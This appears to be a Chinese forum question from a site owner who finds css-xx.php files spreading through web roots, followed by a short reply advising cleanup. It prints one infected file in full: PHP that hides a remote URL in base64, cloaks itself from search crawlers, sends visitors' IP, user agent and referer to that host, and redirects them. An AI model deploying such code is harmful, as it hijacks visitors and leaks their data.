首页 » 互联网资讯 » 正文

网站根目录下发现很多css-xx.php文件,是中毒了吗?

home/wwwroot/www.xx.com/
所有网站根目录下发现好多  css-xx.php的 文件,有蔓延迹象,是不是病毒啊

随便贴一个 css-anh.php

  1. <!–?
  2. error_reporting(0);
  3. $xred=base64_decode(‘aHR0cDovLzk1LjIxMS4xMzMuMTY0LzFhd2VydG9tZXMv’);
  4. $ips = array(“209.185.108”, “209.185.253”, “209.85.238”, “209.85.238.11”, “209.85.238.4”, “216.239.33.96”, “216.239.33.97”, “216.239.33.98”, “216.239.33.99”, “216.239.37.98”, “216.239.37.99”, “216.239.39.98”, “216.239.39.99”, “216.239.41.96”, “216.239.41.97”, “216.239.41.98”, “216.239.41.99”, “216.239.45.4”, “216.239.46”, “216.239.51.96”, “216.239.51.97”, “216.239.51.98”, “216.239.51.99”, “216.239.53.98”, “216.239.53.99”, “216.239.57.96”, “216.239.57.97”, “216.239.57.98”, “216.239.57.99”, “216.239.59.98”, “216.239.59.99”, “216.33.229.163”, “64.233.173.193”, “64.233.173.194”, “64.233.173.195”, “64.233.173.196”, “64.233.173.197”, “64.233.173.198”, “64.233.173.199”, “64.233.173.200”, “64.233.173.201”, “64.233.173.202”, “64.233.173.203”, “64.233.173.204”, “64.233.173.205”, “64.233.173.206”, “64.233.173.207”, “64.233.173.208”, “64.233.173.209”, “64.233.173.210”, “64.233.173.211”, “64.233.173.212”, “64.233.173.213”, “64.233.173.214”, “64.233.173.215”, “64.233.173.216”, “64.233.173.217”, “64.233.173.218”, “64.233.173.219”, “64.233.173.220”, “64.233.173.221”, “64.233.173.222”, “64.233.173.223”, “64.233.173.224”, “64.233.173.225”, “64.233.173.226”, “64.233.173.227”, “64.233.173.228”, “64.233.173.229”, “64.233.173.230”, “64.233.173.231”, “64.233.173.232”, “64.233.173.233”, “64.233.173.234”, “64.233.173.235”, “64.233.173.236”, “64.233.173.237”, “64.233.173.238”, “64.233.173.239”, “64.233.173.240”, “64.233.173.241”, “64.233.173.242”, “64.233.173.243”, “64.233.173.244”, “64.233.173.245”, “64.233.173.246”, “64.233.173.247”, “64.233.173.248”, “64.233.173.249”, “64.233.173.250”, “64.233.173.251”, “64.233.173.252”, “64.233.173.253”, “64.233.173.254”, “64.233.173.255”, “64.68.80”, “64.68.81”, “64.68.82”, “64.68.83”, “64.68.84”, “64.68.85”, “64.68.86”, “64.68.87”, “64.68.88”, “64.68.89”, “64.68.90.1”, “64.68.90.10”, “64.68.90.11”, “64.68.90.12”, “64.68.90.129”, “64.68.90.13”, “64.68.90.130”, “64.68.90.131”, “64.68.90.132”, “64.68.90.133”, “64.68.90.134”, “64.68.90.135”, “64.68.90.136”, “64.68.90.137”, “64.68.90.138”, “64.68.90.139”, “64.68.90.14”, “64.68.90.140”, “64.68.90.141”, “64.68.90.142”, “64.68.90.143”, “64.68.90.144”, “64.68.90.145”, “64.68.90.146”, “64.68.90.147”, “64.68.90.148”, “64.68.90.149”, “64.68.90.15”, “64.68.90.150”, “64.68.90.151”, “64.68.90.152”, “64.68.90.153”, “64.68.90.154”, “64.68.90.155”, “64.68.90.156”, “64.68.90.157”, “64.68.90.158”, “64.68.90.159”, “64.68.90.16”, “64.68.90.160”, “64.68.90.161”, “64.68.90.162”, “64.68.90.163”, “64.68.90.164”, “64.68.90.165”, “64.68.90.166”, “64.68.90.167”, “64.68.90.168”, “64.68.90.169”, “64.68.90.17”, “64.68.90.170”, “64.68.90.171”, “64.68.90.172”, “64.68.90.173”, “64.68.90.174”, “64.68.90.175”, “64.68.90.176”, “64.68.90.177”, “64.68.90.178”, “64.68.90.179”, “64.68.90.18”, “64.68.90.180”, “64.68.90.181”, “64.68.90.182”, “64.68.90.183”, “64.68.90.184”, “64.68.90.185”, “64.68.90.186”, “64.68.90.187”, “64.68.90.188”, “64.68.90.189”, “64.68.90.19”, “64.68.90.190”, “64.68.90.191”, “64.68.90.192”, “64.68.90.193”, “64.68.90.194”, “64.68.90.195”, “64.68.90.196”, “64.68.90.197”, “64.68.90.198”, “64.68.90.199”, “64.68.90.2”, “64.68.90.20”, “64.68.90.200”, “64.68.90.201”, “64.68.90.202”, “64.68.90.203”, “64.68.90.204”, “64.68.90.205”, “64.68.90.206”, “64.68.90.207”, “64.68.90.208”, “64.68.90.21”, “64.68.90.22”, “64.68.90.23”, “64.68.90.24”, “64.68.90.25”, “64.68.90.26”, “64.68.90.273.190”, “64.233.191”, “66.249.64”, “66.249.65”, “66.249.66”, “66.249.67”, “66.249.68”, “66.249.69”, “66.249.70”, “66.249.71”, “66.249.72”, “66.249.73”, “66.249.74”, “66.249.75”, “66.249.76”, “66.249.77”, “66.249.78”, “66.249.79”, “66.249.80”, “66.249.81”, “66.249.82”, “66.249.83”, “66.249.84”, “66.249.85”, “66.249.86”, “66.249.87”, “66.249.88”, “66.249.89”, “66.249.90”, “66.249.91”, “66.249.92”, “66.249.93”, “66.249.94”, “66.249.95”);
  5. $thisip = $_SERVER[“REMOTE_ADDR”];
  6. $isbot = false;
  7. $zones = array(“.AC”, “.AD”, “.AE”, “.AERO”, “.AF”, “.AG”, “.AI”, “.AL”, “.AM”, “.AN”, “.AO”, “.AQ”, “.AR”, “.ARPA”, “.AS”, “.ASIA”, “.AT”, “.AU”, “.AW”, “.AX”, “.AZ”, “.BA”, “.BB”, “.BD”, “.BE”, “.BF”, “.BG”, “.BH”, “.BI”, “.BIZ”, “.BJ”, “.BM”, “.BN”, “.BO”, “.BR”, “.BS”, “.BT”, “.BV”, “.BW”, “.BY”, “.BZ”, “.CA”, “.CAT”, “.CC”, “.CD”, “.CF”, “.CG”, “.CH”, “.CI”, “.CK”, “.CL”, “.CM”, “.CN”, “.CO”, “.COM”, “.COOP”, “.CR”, “.CU”, “.CV”, “.CX”, “.CY”, “.CZ”, “.DE”, “.DJ”, “.DK”, “.DM”, “.DO”, “.DZ”, “.EC”, “.EDU”, “.EE”, “.EG”, “.ER”, “.ES”, “.ET”, “.EU”, “.FI”, “.FJ”, “.FK”, “.FM”, “.FO”, “.FR”, “.GA”, “.GB”, “.GD”, “.GE”, “.GF”, “.GG”, “.GH”, “.GI”, “.GL”, “.GM”, “.GN”, “.GOV”, “.GP”, “.GQ”, “.GR”, “.GS”, “.GT”, “.GU”, “.GW”, “.GY”, “.HK”, “.HM”, “.HN”, “.HR”, “.HT”, “.HU”, “.ID”, “.IE”, “.IL”, “.IM”, “.IN”, “.INFO”, “.INT”, “.IO”, “.IQ”, “.IR”, “.IS”, “.IT”, “.JE”, “.JM”, “.JO”, “.JOBS”, “.JP”, “.KE”, “.KG”, “.KH”, “.KI”, “.KM”, “.KN”, “.KP”, “.KR”, “.KW”, “.KY”, “.KZ”, “.LA”, “.LB”, “.LC”, “.LI”, “.LK”, “.LR”, “.LS”, “.LT”, “.LU”, “.LV”, “.LY”, “.MA”, “.MC”, “.MD”, “.ME”, “.MG”, “.MH”, “.MIL”, “.MK”, “.ML”, “.MM”, “.MN”, “.MO”, “.MOBI”, “.MP”, “.MQ”, “.MR”, “.MS”, “.MT”, “.MU”, “.MUSEUM”, “.MV”, “.MW”, “.MX”, “.MY”, “.MZ”, “.NA”, “.NAME”, “.NC”, “.NE”, “.NET”, “.NF”, “.NG”, “.NI”, “.NL”, “.NO”, “.NP”, “.NR”, “.NU”, “.NZ”, “.OM”, “.ORG”, “.PA”, “.PE”, “.PF”, “.PG”, “.PH”, “.PK”, “.PL”, “.PM”, “.PN”, “.PR”, “.PRO”, “.PS”, “.PT”, “.PW”, “.PY”, “.QA”, “.RE”, “.RO”, “.RS”, “.RU”, “.RW”, “.SA”, “.SB”, “.SC”, “.SD”, “.SE”, “.SG”, “.SH”, “.SI”, “.SJ”, “.SK”, “.SL”, “.SM”, “.SN”, “.SO”, “.SR”, “.ST”, “.SU”, “.SV”, “.SY”, “.SZ”, “.TC”, “.TD”, “.TEL”, “.TF”, “.TG”, “.TH”, “.TJ”, “.TK”, “.TL”, “.TM”, “.TN”, “.TO”, “.TP”, “.TR”, “.TT”, “.TV”, “.TW”, “.TZ”, “.UA”, “.UG”, “.UK”, “.US”, “.UY”, “.UZ”, “.VA”, “.VC”, “.VE”, “.VG”, “.VI”, “.VN”, “.VU”, “.WF”, “.WS”, “.YE”, “.YT”, “.YU”, “.ZA”, “.ZM”, “.ZW”);
  8. for ($i=0; $i<count($ips); $i++)
  9. {
  10. $curip = trim($ips[$i]);
  11. if (strstr($thisip, $curip))
  12. {
  13. $isbot = true;
  14. }
  15. }
  16. if (!$isbot)
  17. {
  18. $osystems = $_SERVER[“HTTP_USER_AGENT”];
  19. $osx = strchr($osystems,”Windows”);
  20. if (!$osx)
  21. {
  22. $isbot = true;
  23. }
  24. $browsers1=strchr($osystems,”Firefox”);
  25. $browsers2=strchr($osystems,”Chrome”);
  26. if ( ($browsers1) or ($browsers2) )
  27. {
  28. $isbot = true;
  29. }
  30. }
  31. function xinclude ($path,$rt)
  32. {
  33. if (!function_exists (“file_get_contents”))
  34. {
  35. function file_get_contents ($addr)
  36. {
  37. $a = @fopen ($addr, “r”);
  38. $tmp = @fread ($a, sprintf (“%u”, @filesize ($a)));
  39. @fclose ($a);
  40. if ($a) return @$tmp;
  41. }
  42. }
  43. if (!function_exists (“file_put_contents”))
  44. {
  45. function file_put_contents ($addr, $con)
  46. {
  47. $a = @fopen ($addr, “w+”);
  48. if (!$a) return 0;
  49. @fwrite ($a, $con);
  50. @fclose ($a);
  51. return @strlen ($con);
  52. }
  53. }
  54. $content = file_get_contents ($path);
  55. if ($content==””)
  56. {
  57. $curl = curl_init ();
  58. curl_setopt ($curl, CURLOPT_URL, trim($path));
  59. curl_setopt ($curl, CURLOPT_RETURNTRANSFER, 1);
  60. curl_setopt ($curl, CURLOPT_CONNECTTIMEOUT, 5);
  61. curl_setopt ($curl, CURLOPT_TIMEOUT, 5);
  62. $content = curl_exec ($curl);
  63. curl_close($curl);
  64. }
  65. if ($content!=””)
  66. {
  67. if ($rt==1) {return $content;}
  68. }
  69. }
  70. if (!$isbot)
  71. {
  72. $agent7=base64_encode($_SERVER[“HTTP_USER_AGENT”]);
  73. $ip7=base64_encode($_SERVER[“REMOTE_ADDR”]);
  74. $ref7=base64_encode($_SERVER[“HTTP_REFERER”]);
  75. $xred=”$xred?agent=$agent7&ip=$ip7&ref=$ref7″;
  76. $red_url_cur=xinclude(“$xred”,”1″);
  77. $red_url_cur=trim($red_url_cur);
  78. header(“Location: $red_url_cur”);
  79. }
  80. ?>

——————————————————————————————————————————————————–

像是个攻击网站的脚本

可能网站程序有漏洞,最好是所有的目录都查一下,把可疑文件都删掉,换掉所有的密码

发表评论